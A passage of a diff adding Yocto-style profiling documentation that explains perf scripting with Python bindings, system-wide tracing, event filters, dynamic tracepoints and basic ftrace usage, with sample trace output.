+         wget  1262 [001] 11624.859076: softirq_entry: vec=1 [action=TIMER]
+         wget  1262 [001] 11624.859083: softirq_exit: vec=1 [action=TIMER]
+         wget  1262 [001] 11624.859167: sys_enter_read: fd: 0x0003, buf: 0xb7720000, count: 0x0400
+         wget  1262 [001] 11624.859192: sys_exit_read: 0x1d7
+         wget  1262 [001] 11624.859228: sys_enter_read: fd: 0x0003, buf: 0xb7720000, count: 0x0400
+         wget  1262 [001] 11624.859233: sys_exit_read: 0x0
+         wget  1262 [001] 11624.859573: sys_enter_read: fd: 0x0003, buf: 0xbf82c580, count: 0x0200
+         wget  1262 [001] 11624.859584: sys_exit_read: 0x200
+         wget  1262 [001] 11624.859864: sys_enter_read: fd: 0x0003, buf: 0xb7720000, count: 0x0400
+         wget  1262 [001] 11624.859888: sys_exit_read: 0x400
+         wget  1262 [001] 11624.859935: sys_enter_read: fd: 0x0003, buf: 0xb7720000, count: 0x0400
+         wget  1262 [001] 11624.859944: sys_exit_read: 0x400
+
+This gives us a detailed timestamped sequence of events that occurred within the
+workload with respect to those events.
+
+In many ways, profiling can be viewed as a subset of tracing -
+theoretically, if you have a set of trace events that's sufficient to
+capture all the important aspects of a workload, you can derive any of
+the results or views that a profiling run can.
+
+Another aspect of traditional profiling is that while powerful in many
+ways, it's limited by the granularity of the underlying data. Profiling
+tools offer various ways of sorting and presenting the sample data,
+which make it much more useful and amenable to user experimentation, but
+in the end it can't be used in an open-ended way to extract data that
+just isn't present as a consequence of the fact that conceptually, most
+of it has been thrown away.
+
+Full-blown detailed tracing data does however offer the opportunity to
+manipulate and present the information collected during a tracing run in
+an infinite variety of ways.
+
+Another way to look at it is that there are only so many ways that the
+'primitive' counters can be used on their own to generate interesting
+output; to get anything more complicated than simple counts requires
+some amount of additional logic, which is typically very specific to the
+problem at hand. For example, if we wanted to make use of a 'counter'
+that maps to the value of the time difference between when a process was
+scheduled to run on a processor and the time it actually ran, we
+wouldn't expect such a counter to exist on its own, but we could derive
+one called say 'wakeup_latency' and use it to extract a useful view of
+that metric from trace data. Likewise, we really can't figure out from
+standard profiling tools how much data every process on the system reads
+and writes, along with how many of those reads and writes fail
+completely. If we have sufficient trace data, however, we could with the
+right tools easily extract and present that information, but we'd need
+something other than pre-canned profiling tools to do that.
+
+Luckily, there is a general-purpose way to handle such needs, called
+'programming languages'. Making programming languages easily available
+to apply to such problems given the specific format of data is called a
+'programming language binding' for that data and language. Perf supports
+two programming language bindings, one for Python and one for Perl.
+
+.. admonition:: Tying it Together
+
+   Language bindings for manipulating and aggregating trace data are of
+   course not a new idea. One of the first projects to do this was IBM's
+   DProbes dpcc compiler, an ANSI C compiler which targeted a low-level
+   assembly language running on an in-kernel interpreter on the target
+   system. This is exactly analogous to what Sun's DTrace did, except
+   that DTrace invented its own language for the purpose. Systemtap,
+   heavily inspired by DTrace, also created its own one-off language,
+   but rather than running the product on an in-kernel interpreter,
+   created an elaborate compiler-based machinery to translate its
+   language into kernel modules written in C.
+
+Now that we have the trace data in perf.data, we can use 'perf script
+-g' to generate a skeleton script with handlers for the read/write
+entry/exit events we recorded: ::
+
+   root@crownbay:~# perf script -g python
+   generated Python script: perf-script.py
+
+The skeleton script simply creates a python function for each event type in the
+perf.data file. The body of each function simply prints the event name along
+with its parameters. For example:
+
+.. code-block:: python
+
+   def net__netif_rx(event_name, context, common_cpu,
+          common_secs, common_nsecs, common_pid, common_comm,
+          skbaddr, len, name):
+                  print_header(event_name, common_cpu, common_secs, common_nsecs,
+                          common_pid, common_comm)
+
+                  print "skbaddr=%u, len=%u, name=%s\n" % (skbaddr, len, name),
+
+We can run that script directly to print all of the events contained in the
+perf.data file: ::
+
+   root@crownbay:~# perf script -s perf-script.py
+
+   in trace_begin
+   syscalls__sys_exit_read     0 11624.857082795     1262 perf                  nr=3, ret=0
+   sched__sched_wakeup      0 11624.857193498     1262 perf                  comm=migration/0, pid=6, prio=0,      success=1, target_cpu=0
+   irq__softirq_raise       1 11624.858021635     1262 wget                  vec=TIMER
+   irq__softirq_entry       1 11624.858074075     1262 wget                  vec=TIMER
+   irq__softirq_exit        1 11624.858081389     1262 wget                  vec=TIMER
+   syscalls__sys_enter_read     1 11624.858166434     1262 wget                  nr=3, fd=3, buf=3213019456,      count=512
+   syscalls__sys_exit_read     1 11624.858177924     1262 wget                  nr=3, ret=512
+   skb__kfree_skb           1 11624.858878188     1262 wget                  skbaddr=3945041280,           location=3243922184, protocol=0
+   skb__kfree_skb           1 11624.858945608     1262 wget                  skbaddr=3945037824,      location=3243922184, protocol=0
+   irq__softirq_raise       1 11624.859020942     1262 wget                  vec=TIMER
+   irq__softirq_entry       1 11624.859076935     1262 wget                  vec=TIMER
+   irq__softirq_exit        1 11624.859083469     1262 wget                  vec=TIMER
+   syscalls__sys_enter_read     1 11624.859167565     1262 wget                  nr=3, fd=3, buf=3077701632,      count=1024
+   syscalls__sys_exit_read     1 11624.859192533     1262 wget                  nr=3, ret=471
+   syscalls__sys_enter_read     1 11624.859228072     1262 wget                  nr=3, fd=3, buf=3077701632,      count=1024
+   syscalls__sys_exit_read     1 11624.859233707     1262 wget                  nr=3, ret=0
+   syscalls__sys_enter_read     1 11624.859573008     1262 wget                  nr=3, fd=3, buf=3213018496,      count=512
+   syscalls__sys_exit_read     1 11624.859584818     1262 wget                  nr=3, ret=512
+   syscalls__sys_enter_read     1 11624.859864562     1262 wget                  nr=3, fd=3, buf=3077701632,      count=1024
+   syscalls__sys_exit_read     1 11624.859888770     1262 wget                  nr=3, ret=1024
+   syscalls__sys_enter_read     1 11624.859935140     1262 wget                  nr=3, fd=3, buf=3077701632,      count=1024
+   syscalls__sys_exit_read     1 11624.859944032     1262 wget                  nr=3, ret=1024
+
+That in itself isn't very useful; after all, we can accomplish pretty much the
+same thing by simply running 'perf script' without arguments in the same
+directory as the perf.data file.
+
+We can however replace the print statements in the generated function
+bodies with whatever we want, and thereby make it infinitely more
+useful.
+
+As a simple example, let's just replace the print statements in the
+function bodies with a simple function that does nothing but increment a
+per-event count. When the program is run against a perf.data file, each
+time a particular event is encountered, a tally is incremented for that
+event. For example:
+
+.. code-block:: python
+
+   def net__netif_rx(event_name, context, common_cpu,
+          common_secs, common_nsecs, common_pid, common_comm,
+          skbaddr, len, name):
+              inc_counts(event_name)
+
+Each event handler function in the generated code
+is modified to do this. For convenience, we define a common function
+called inc_counts() that each handler calls; inc_counts() simply tallies
+a count for each event using the 'counts' hash, which is a specialized
+hash function that does Perl-like autovivification, a capability that's
+extremely useful for kinds of multi-level aggregation commonly used in
+processing traces (see perf's documentation on the Python language
+binding for details):
+
+.. code-block:: python
+
+     counts = autodict()
+
+     def inc_counts(event_name):
+            try:
+                    counts[event_name] += 1
+            except TypeError:
+                    counts[event_name] = 1
+
+Finally, at the end of the trace processing run, we want to print the
+result of all the per-event tallies. For that, we use the special
+'trace_end()' function:
+
+.. code-block:: python
+
+     def trace_end():
+            for event_name, count in counts.iteritems():
+                    print "%-40s %10s\n" % (event_name, count)
+
+The end result is a summary of all the events recorded in the trace: ::
+
+   skb__skb_copy_datagram_iovec                  13148
+   irq__softirq_entry                             4796
+   irq__irq_handler_exit                          3805
+   irq__softirq_exit                              4795
+   syscalls__sys_enter_write                      8990
+   net__net_dev_xmit                               652
+   skb__kfree_skb                                 4047
+   sched__sched_wakeup                            1155
+   irq__irq_handler_entry                         3804
+   irq__softirq_raise                             4799
+   net__net_dev_queue                              652
+   syscalls__sys_enter_read                      17599
+   net__netif_receive_skb                         1743
+   syscalls__sys_exit_read                       17598
+   net__netif_rx                                     2
+   napi__napi_poll                                1877
+   syscalls__sys_exit_write                       8990
+
+Note that this is
+pretty much exactly the same information we get from 'perf stat', which
+goes a little way to support the idea mentioned previously that given
+the right kind of trace data, higher-level profiling-type summaries can
+be derived from it.
+
+Documentation on using the `'perf script' python
+binding <http://linux.die.net/man/1/perf-script-python>`__.
+
+System-Wide Tracing and Profiling
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The examples so far have focused on tracing a particular program or
+workload - in other words, every profiling run has specified the program
+to profile in the command-line e.g. 'perf record wget ...'.
+
+It's also possible, and more interesting in many cases, to run a
+system-wide profile or trace while running the workload in a separate
+shell.
+
+To do system-wide profiling or tracing, you typically use the -a flag to
+'perf record'.
+
+To demonstrate this, open up one window and start the profile using the
+-a flag (press Ctrl-C to stop tracing): ::
+
+   root@crownbay:~# perf record -g -a
+   ^C[ perf record: Woken up 6 times to write data ]
+   [ perf record: Captured and wrote 1.400 MB perf.data (~61172 samples) ]
+
+In another window, run the wget test: ::
+
+   root@crownbay:~# wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2
+   Connecting to downloads.yoctoproject.org (140.211.169.59:80)
+   linux-2.6.19.2.tar.b 100% \|*******************************\| 41727k 0:00:00 ETA
+
+Here we see entries not only for our wget load, but for
+other processes running on the system as well:
+
+.. image:: figures/perf-systemwide.png
+   :align: center
+
+In the snapshot above, we can see callchains that originate in libc, and
+a callchain from Xorg that demonstrates that we're using a proprietary X
+driver in userspace (notice the presence of 'PVR' and some other
+unresolvable symbols in the expanded Xorg callchain).
+
+Note also that we have both kernel and userspace entries in the above
+snapshot. We can also tell perf to focus on userspace but providing a
+modifier, in this case 'u', to the 'cycles' hardware counter when we
+record a profile: ::
+
+   root@crownbay:~# perf record -g -a -e cycles:u
+   ^C[ perf record: Woken up 2 times to write data ]
+   [ perf record: Captured and wrote 0.376 MB perf.data (~16443 samples) ]
+
+.. image:: figures/perf-report-cycles-u.png
+   :align: center
+
+Notice in the screenshot above, we see only userspace entries ([.])
+
+Finally, we can press 'enter' on a leaf node and select the 'Zoom into
+DSO' menu item to show only entries associated with a specific DSO. In
+the screenshot below, we've zoomed into the 'libc' DSO which shows all
+the entries associated with the libc-xxx.so DSO.
+
+.. image:: figures/perf-systemwide-libc.png
+   :align: center
+
+We can also use the system-wide -a switch to do system-wide tracing.
+Here we'll trace a couple of scheduler events: ::
+
+   root@crownbay:~# perf record -a -e sched:sched_switch -e sched:sched_wakeup
+   ^C[ perf record: Woken up 38 times to write data ]
+   [ perf record: Captured and wrote 9.780 MB perf.data (~427299 samples) ]
+
+We can look at the raw output using 'perf script' with no arguments: ::
+
+   root@crownbay:~# perf script
+
+              perf  1383 [001]  6171.460045: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+              perf  1383 [001]  6171.460066: sched_switch: prev_comm=perf prev_pid=1383 prev_prio=120 prev_state=R+ ==> next_comm=kworker/1:1 next_pid=21 next_prio=120
+       kworker/1:1    21 [001]  6171.460093: sched_switch: prev_comm=kworker/1:1 prev_pid=21 prev_prio=120 prev_state=S ==> next_comm=perf next_pid=1383 next_prio=120
+           swapper     0 [000]  6171.468063: sched_wakeup: comm=kworker/0:3 pid=1209 prio=120 success=1 target_cpu=000
+           swapper     0 [000]  6171.468107: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=kworker/0:3 next_pid=1209 next_prio=120
+       kworker/0:3  1209 [000]  6171.468143: sched_switch: prev_comm=kworker/0:3 prev_pid=1209 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
+              perf  1383 [001]  6171.470039: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+              perf  1383 [001]  6171.470058: sched_switch: prev_comm=perf prev_pid=1383 prev_prio=120 prev_state=R+ ==> next_comm=kworker/1:1 next_pid=21 next_prio=120
+       kworker/1:1    21 [001]  6171.470082: sched_switch: prev_comm=kworker/1:1 prev_pid=21 prev_prio=120 prev_state=S ==> next_comm=perf next_pid=1383 next_prio=120
+              perf  1383 [001]  6171.480035: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+
+.. _perf-filtering:
+
+Filtering
+^^^^^^^^^
+
+Notice that there are a lot of events that don't really have anything to
+do with what we're interested in, namely events that schedule 'perf'
+itself in and out or that wake perf up. We can get rid of those by using
+the '--filter' option - for each event we specify using -e, we can add a
+--filter after that to filter out trace events that contain fields with
+specific values: ::
+
+   root@crownbay:~# perf record -a -e sched:sched_switch --filter 'next_comm != perf && prev_comm != perf' -e sched:sched_wakeup --filter 'comm != perf'
+   ^C[ perf record: Woken up 38 times to write data ]
+   [ perf record: Captured and wrote 9.688 MB perf.data (~423279 samples) ]
+
+
+   root@crownbay:~# perf script
+
+           swapper     0 [000]  7932.162180: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=kworker/0:3 next_pid=1209 next_prio=120
+       kworker/0:3  1209 [000]  7932.162236: sched_switch: prev_comm=kworker/0:3 prev_pid=1209 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
+              perf  1407 [001]  7932.170048: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+              perf  1407 [001]  7932.180044: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+              perf  1407 [001]  7932.190038: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+              perf  1407 [001]  7932.200044: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+              perf  1407 [001]  7932.210044: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+              perf  1407 [001]  7932.220044: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+           swapper     0 [001]  7932.230111: sched_wakeup: comm=kworker/1:1 pid=21 prio=120 success=1 target_cpu=001
+           swapper     0 [001]  7932.230146: sched_switch: prev_comm=swapper/1 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=kworker/1:1 next_pid=21 next_prio=120
+       kworker/1:1    21 [001]  7932.230205: sched_switch: prev_comm=kworker/1:1 prev_pid=21 prev_prio=120 prev_state=S ==> next_comm=swapper/1 next_pid=0 next_prio=120
+           swapper     0 [000]  7932.326109: sched_wakeup: comm=kworker/0:3 pid=1209 prio=120 success=1 target_cpu=000
+           swapper     0 [000]  7932.326171: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=kworker/0:3 next_pid=1209 next_prio=120
+       kworker/0:3  1209 [000]  7932.326214: sched_switch: prev_comm=kworker/0:3 prev_pid=1209 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
+
+In this case, we've filtered out all events that have
+'perf' in their 'comm' or 'comm_prev' or 'comm_next' fields. Notice that
+there are still events recorded for perf, but notice that those events
+don't have values of 'perf' for the filtered fields. To completely
+filter out anything from perf will require a bit more work, but for the
+purpose of demonstrating how to use filters, it's close enough.
+
+.. admonition:: Tying it Together
+
+   These are exactly the same set of event filters defined by the trace
+   event subsystem. See the ftrace/tracecmd/kernelshark section for more
+   discussion about these event filters.
+
+.. admonition:: Tying it Together
+
+   These event filters are implemented by a special-purpose
+   pseudo-interpreter in the kernel and are an integral and
+   indispensable part of the perf design as it relates to tracing.
+   kernel-based event filters provide a mechanism to precisely throttle
+   the event stream that appears in user space, where it makes sense to
+   provide bindings to real programming languages for postprocessing the
+   event stream. This architecture allows for the intelligent and
+   flexible partitioning of processing between the kernel and user
+   space. Contrast this with other tools such as SystemTap, which does
+   all of its processing in the kernel and as such requires a special
+   project-defined language in order to accommodate that design, or
+   LTTng, where everything is sent to userspace and as such requires a
+   super-efficient kernel-to-userspace transport mechanism in order to
+   function properly. While perf certainly can benefit from for instance
+   advances in the design of the transport, it doesn't fundamentally
+   depend on them. Basically, if you find that your perf tracing
+   application is causing buffer I/O overruns, it probably means that
+   you aren't taking enough advantage of the kernel filtering engine.
+
+Using Dynamic Tracepoints
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+perf isn't restricted to the fixed set of static tracepoints listed by
+'perf list'. Users can also add their own 'dynamic' tracepoints anywhere
+in the kernel. For instance, suppose we want to define our own
+tracepoint on do_fork(). We can do that using the 'perf probe' perf
+subcommand: ::
+
+   root@crownbay:~# perf probe do_fork
+   Added new event:
+     probe:do_fork        (on do_fork)
+
+   You can now use it in all perf tools, such as:
+
+     perf record -e probe:do_fork -aR sleep 1
+
+Adding a new tracepoint via
+'perf probe' results in an event with all the expected files and format
+in /sys/kernel/debug/tracing/events, just the same as for static
+tracepoints (as discussed in more detail in the trace events subsystem
+section: ::
+
+   root@crownbay:/sys/kernel/debug/tracing/events/probe/do_fork# ls -al
+   drwxr-xr-x    2 root     root             0 Oct 28 11:42 .
+   drwxr-xr-x    3 root     root             0 Oct 28 11:42 ..
+   -rw-r--r--    1 root     root             0 Oct 28 11:42 enable
+   -rw-r--r--    1 root     root             0 Oct 28 11:42 filter
+   -r--r--r--    1 root     root             0 Oct 28 11:42 format
+   -r--r--r--    1 root     root             0 Oct 28 11:42 id
+
+   root@crownbay:/sys/kernel/debug/tracing/events/probe/do_fork# cat format
+   name: do_fork
+   ID: 944
+   format:
+           field:unsigned short common_type;	offset:0;	size:2;	signed:0;
+           field:unsigned char common_flags;	offset:2;	size:1;	signed:0;
+           field:unsigned char common_preempt_count;	offset:3;	size:1;	signed:0;
+           field:int common_pid;	offset:4;	size:4;	signed:1;
+           field:int common_padding;	offset:8;	size:4;	signed:1;
+
+           field:unsigned long __probe_ip;	offset:12;	size:4;	signed:0;
+
+   print fmt: "(%lx)", REC->__probe_ip
+
+We can list all dynamic tracepoints currently in
+existence: ::
+
+   root@crownbay:~# perf probe -l
+    probe:do_fork (on do_fork)
+    probe:schedule (on schedule)
+
+Let's record system-wide ('sleep 30' is a
+trick for recording system-wide but basically do nothing and then wake
+up after 30 seconds): ::
+
+   root@crownbay:~# perf record -g -a -e probe:do_fork sleep 30
+   [ perf record: Woken up 1 times to write data ]
+   [ perf record: Captured and wrote 0.087 MB perf.data (~3812 samples) ]
+
+Using 'perf script' we can see each do_fork event that fired: ::
+
+   root@crownbay:~# perf script
+
+   # ========
+   # captured on: Sun Oct 28 11:55:18 2012
+   # hostname : crownbay
+   # os release : 3.4.11-yocto-standard
+   # perf version : 3.4.11
+   # arch : i686
+   # nrcpus online : 2
+   # nrcpus avail : 2
+   # cpudesc : Intel(R) Atom(TM) CPU E660 @ 1.30GHz
+   # cpuid : GenuineIntel,6,38,1
+   # total memory : 1017184 kB
+   # cmdline : /usr/bin/perf record -g -a -e probe:do_fork sleep 30
+   # event : name = probe:do_fork, type = 2, config = 0x3b0, config1 = 0x0, config2 = 0x0, excl_usr = 0, excl_kern
+    = 0, id = { 5, 6 }
+   # HEADER_CPU_TOPOLOGY info available, use -I to display
+   # ========
+   #
+    matchbox-deskto  1197 [001] 34211.378318: do_fork: (c1028460)
+    matchbox-deskto  1295 [001] 34211.380388: do_fork: (c1028460)
+            pcmanfm  1296 [000] 34211.632350: do_fork: (c1028460)
+            pcmanfm  1296 [000] 34211.639917: do_fork: (c1028460)
+    matchbox-deskto  1197 [001] 34217.541603: do_fork: (c1028460)
+    matchbox-deskto  1299 [001] 34217.543584: do_fork: (c1028460)
+             gthumb  1300 [001] 34217.697451: do_fork: (c1028460)
+             gthumb  1300 [001] 34219.085734: do_fork: (c1028460)
+             gthumb  1300 [000] 34219.121351: do_fork: (c1028460)
+             gthumb  1300 [001] 34219.264551: do_fork: (c1028460)
+            pcmanfm  1296 [000] 34219.590380: do_fork: (c1028460)
+    matchbox-deskto  1197 [001] 34224.955965: do_fork: (c1028460)
+    matchbox-deskto  1306 [001] 34224.957972: do_fork: (c1028460)
+    matchbox-termin  1307 [000] 34225.038214: do_fork: (c1028460)
+    matchbox-termin  1307 [001] 34225.044218: do_fork: (c1028460)
+    matchbox-termin  1307 [000] 34225.046442: do_fork: (c1028460)
+    matchbox-deskto  1197 [001] 34237.112138: do_fork: (c1028460)
+    matchbox-deskto  1311 [001] 34237.114106: do_fork: (c1028460)
+               gaku  1312 [000] 34237.202388: do_fork: (c1028460)
+
+And using 'perf report' on the same file, we can see the
+callgraphs from starting a few programs during those 30 seconds:
+
+.. image:: figures/perf-probe-do_fork-profile.png
+   :align: center
+
+.. admonition:: Tying it Together
+
+   The trace events subsystem accommodate static and dynamic tracepoints
+   in exactly the same way - there's no difference as far as the
+   infrastructure is concerned. See the ftrace section for more details
+   on the trace event subsystem.
+
+.. admonition:: Tying it Together
+
+   Dynamic tracepoints are implemented under the covers by kprobes and
+   uprobes. kprobes and uprobes are also used by and in fact are the
+   main focus of SystemTap.
+
+.. _perf-documentation:
+
+Perf Documentation
+------------------
+
+Online versions of the man pages for the commands discussed in this
+section can be found here:
+
+-  The `'perf stat' manpage <http://linux.die.net/man/1/perf-stat>`__.
+
+-  The `'perf record'
+   manpage <http://linux.die.net/man/1/perf-record>`__.
+
+-  The `'perf report'
+   manpage <http://linux.die.net/man/1/perf-report>`__.
+
+-  The `'perf probe' manpage <http://linux.die.net/man/1/perf-probe>`__.
+
+-  The `'perf script'
+   manpage <http://linux.die.net/man/1/perf-script>`__.
+
+-  Documentation on using the `'perf script' python
+   binding <http://linux.die.net/man/1/perf-script-python>`__.
+
+-  The top-level `perf(1) manpage <http://linux.die.net/man/1/perf>`__.
+
+Normally, you should be able to invoke the man pages via perf itself
+e.g. 'perf help' or 'perf help record'.
+
+However, by default Yocto doesn't install man pages, but perf invokes
+the man pages for most help functionality. This is a bug and is being
+addressed by a Yocto bug: :yocto_bugs:`Bug 3388 - perf: enable man pages for basic
+'help' functionality </show_bug.cgi?id=3388>`.
+
+The man pages in text form, along with some other files, such as a set
+of examples, can be found in the 'perf' directory of the kernel tree: ::
+
+   tools/perf/Documentation
+
+There's also a nice perf tutorial on the perf
+wiki that goes into more detail than we do here in certain areas: `Perf
+Tutorial <https://perf.wiki.kernel.org/index.php/Tutorial>`__
+
+.. _profile-manual-ftrace:
+
+ftrace
+======
+
+'ftrace' literally refers to the 'ftrace function tracer' but in reality
+this encompasses a number of related tracers along with the
+infrastructure that they all make use of.
+
+.. _ftrace-setup:
+
+ftrace Setup
+------------
+
+For this section, we'll assume you've already performed the basic setup
+outlined in the ":ref:`profile-manual/profile-manual-intro:General Setup`" section.
+
+ftrace, trace-cmd, and kernelshark run on the target system, and are
+ready to go out-of-the-box - no additional setup is necessary. For the
+rest of this section we assume you've ssh'ed to the host and will be
+running ftrace on the target. kernelshark is a GUI application and if
+you use the '-X' option to ssh you can have the kernelshark GUI run on
+the target but display remotely on the host if you want.
+
+Basic ftrace usage
+------------------
+
+'ftrace' essentially refers to everything included in the /tracing
+directory of the mounted debugfs filesystem (Yocto follows the standard
+convention and mounts it at /sys/kernel/debug). Here's a listing of all
+the files found in /sys/kernel/debug/tracing on a Yocto system: ::
+
+   root@sugarbay:/sys/kernel/debug/tracing# ls
+   README                      kprobe_events               trace
+   available_events            kprobe_profile              trace_clock
+   available_filter_functions  options                     trace_marker
+   available_tracers           per_cpu                     trace_options
+   buffer_size_kb              printk_formats              trace_pipe
+   buffer_total_size_kb        saved_cmdlines              tracing_cpumask
+   current_tracer              set_event                   tracing_enabled
+   dyn_ftrace_total_info       set_ftrace_filter           tracing_on
+   enabled_functions           set_ftrace_notrace          tracing_thresh
+   events                      set_ftrace_pid
+   free_buffer                 set_graph_function
+
+The files listed above are used for various purposes
+- some relate directly to the tracers themselves, others are used to set
+tracing options, and yet others actually contain the tracing output when
+a tracer is in effect. Some of the functions can be guessed from their
+names, others need explanation; in any case, we'll cover some of the
+files we see here below but for an explanation of the others, please see
+the ftrace documentation.
+
+We'll start by looking at some of the available built-in tracers.
+
+cat'ing the 'available_tracers' file lists the set of available tracers: ::
+
+   root@sugarbay:/sys/kernel/debug/tracing# cat available_tracers
+   blk function_graph function nop
+
+The 'current_tracer' file contains the tracer currently in effect: ::
+
+   root@sugarbay:/sys/kernel/debug/tracing# cat current_tracer
+   nop
+
+The above listing of current_tracer shows that the
+'nop' tracer is in effect, which is just another way of saying that
+there's actually no tracer currently in effect.
+
+echo'ing one of the available_tracers into current_tracer makes the
+specified tracer the current tracer: ::
+
+   root@sugarbay:/sys/kernel/debug/tracing# echo function > current_tracer
+   root@sugarbay:/sys/kernel/debug/tracing# cat current_tracer
+   function
+
+The above sets the current tracer to be the 'function tracer'. This tracer
+traces every function call in the kernel and makes it available as the
+contents of the 'trace' file. Reading the 'trace' file lists the
+currently buffered function calls that have been traced by the function
+tracer: ::
+
+   root@sugarbay:/sys/kernel/debug/tracing# cat trace | less
+
+   # tracer: function
+   #
+   # entries-in-buffer/entries-written: 310629/766471   #P:8
+   #
+   #                              _-----=> irqs-off
+   #                             / _----=> need-resched
+   #                            | / _---=> hardirq/softirq
+   #                            || / _--=> preempt-depth
+   #                            ||| /     delay
+   #           TASK-PID   CPU#  ||||    TIMESTAMP  FUNCTION
+   #              | |       |   ||||       |         |
+            <idle>-0     [004] d..1   470.867169: ktime_get_real <-intel_idle
+            <idle>-0     [004] d..1   470.867170: getnstimeofday <-ktime_get_real
+            <idle>-0     [004] d..1   470.867171: ns_to_timeval <-intel_idle
+            <idle>-0     [004] d..1   470.867171: ns_to_timespec <-ns_to_timeval
+            <idle>-0     [004] d..1   470.867172: smp_apic_timer_interrupt <-apic_timer_interrupt
+            <idle>-0     [004] d..1   470.867172: native_apic_mem_write <-smp_apic_timer_interrupt
+            <idle>-0     [004] d..1   470.867172: irq_enter <-smp_apic_timer_interrupt
+            <idle>-0     [004] d..1   470.867172: rcu_irq_enter <-irq_enter
+            <idle>-0     [004] d..1   470.867173: rcu_idle_exit_common.isra.33 <-rcu_irq_enter
+            <idle>-0     [004] d..1   470.867173: local_bh_disable <-irq_enter
+            <idle>-0     [004] d..1   470.867173: add_preempt_count <-local_bh_disable
+            <idle>-0     [004] d.s1   470.867174: tick_check_idle <-irq_enter
+            <idle>-0     [004] d.s1   470.867174: tick_check_oneshot_broadcast <-tick_check_idle
+            <idle>-0     [004] d.s1   470.867174: ktime_get <-tick_check_idle
+            <idle>-0     [004] d.s1   470.867174: tick_nohz_stop_idle <-tick_check_idle
+            <idle>-0     [004] d.s1   470.867175: update_ts_time_stats <-tick_nohz_stop_idle
+            <idle>-0     [004] d.s1   470.867175: nr_iowait_cpu <-update_ts_time_stats
+            <idle>-0     [004] d.s1   470.867175: tick_do_update_jiffies64 <-tick_check_idle
+            <idle>-0     [004] d.s1   470.867175: _raw_spin_lock <-tick_do_update_jiffies64
+            <idle>-0     [004] d.s1   470.867176: add_preempt_count <-_raw_spin_lock
+            <idle>-0     [004] d.s2   470.867176: do_timer <-tick_do_update_jiffies64
+            <idle>-0     [004] d.s2   470.867176: _raw_spin_lock <-do_timer
+            <idle>-0     [004] d.s2   470.867176: add_preempt_count <-_raw_spin_lock
+            <idle>-0     [004] d.s3   470.867177: ntp_tick_length <-do_timer
+            <idle>-0     [004] d.s3   470.867177: _raw_spin_lock_irqsave <-ntp_tick_length
+            .
+            .
+            .
+
+Each line in the trace above shows what was happening in the kernel on a given
+cpu, to the level of detail of function calls. Each entry shows the function
+called, followed by its caller (after the arrow).
+
+The function tracer gives you an extremely detailed idea of what the
+kernel was doing at the point in time the trace was taken, and is a
+great way to learn about how the kernel code works in a dynamic sense.
+
+.. admonition:: Tying it Together
+
+   The ftrace function tracer is also available from within perf, as the
+   ftrace:function tracepoint.
+
+It is a little more difficult to follow the call chains than it needs to
+be - luckily there's a variant of the function tracer that displays the
+callchains explicitly, called the 'function_graph' tracer: ::
+
+   root@sugarbay:/sys/kernel/debug/tracing# echo function_graph > current_tracer
+   root@sugarbay:/sys/kernel/debug/tracing# cat trace | less
+
+    tracer: function_graph
+
+    CPU  DURATION                  FUNCTION CALLS
+    |     |   |                     |   |   |   |
+   7)   0.046 us    |      pick_next_task_fair();
+   7)   0.043 us    |      pick_next_task_stop();
+   7)   0.042 us    |      pick_next_task_rt();
+   7)   0.032 us    |      pick_next_task_fair();
+   7)   0.030 us    |      pick_next_task_idle();
+   7)               |      _raw_spin_unlock_irq() {
+   7)   0.033 us    |        sub_preempt_count();
+   7)   0.258 us    |      }
+   7)   0.032 us    |      sub_preempt_count();
+   7) + 13.341 us   |    } /* __schedule */
+   7)   0.095 us    |  } /* sub_preempt_count */
+   7)               |  schedule() {
+   7)               |    __schedule() {
+   7)   0.060 us    |      add_preempt_count();
+   7)   0.044 us    |      rcu_note_context_switch();
+   7)               |      _raw_spin_lock_irq() {
+   7)   0.033 us    |        add_preempt_count();
+   7)   0.247 us    |      }
+   7)               |      idle_balance() {
+   7)               |        _raw_spin_unlock() {
+   7)   0.031 us    |          sub_preempt_count();
+   7)   0.246 us    |        }
+   7)               |        update_shares() {
+   7)   0.030 us    |          __rcu_read_lock();
+   7)   0.029 us    |          __rcu_read_unlock();
+   7)   0.484 us    |        }
+   7)   0.030 us    |        __rcu_read_lock();
+   7)               |        load_balance() {
+   7)               |          find_busiest_group() {
+   7)   0.031 us    |            idle_cpu();
+   7)   0.029 us    |            idle_cpu();
+   7)   0.035 us    |            idle_cpu();
+   7)   0.906 us    |          }
+   7)   1.141 us    |        }
+   7)   0.022 us    |        msecs_to_jiffies();
+   7)               |        load_balance() {
+   7)               |          find_busiest_group() {
+   7)   0.031 us    |            idle_cpu();
+   .
+   .
+   .
+   4)   0.062 us    |        msecs_to_jiffies();
+   4)   0.062 us    |        __rcu_read_unlock();
+   4)               |        _raw_spin_lock() {
+   4)   0.073 us    |          add_preempt_count();
+   4)   0.562 us    |        }
+   4) + 17.452 us   |      }
+   4)   0.108 us    |      put_prev_task_fair();
+   4)   0.102 us    |      pick_next_task_fair();
+   4)   0.084 us    |      pick_next_task_stop();
+   4)   0.075 us    |      pick_next_task_rt();
+   4)   0.062 us    |      pick_next_task_fair();
+   4)   0.066 us    |      pick_next_task_idle();
+   ------------------------------------------
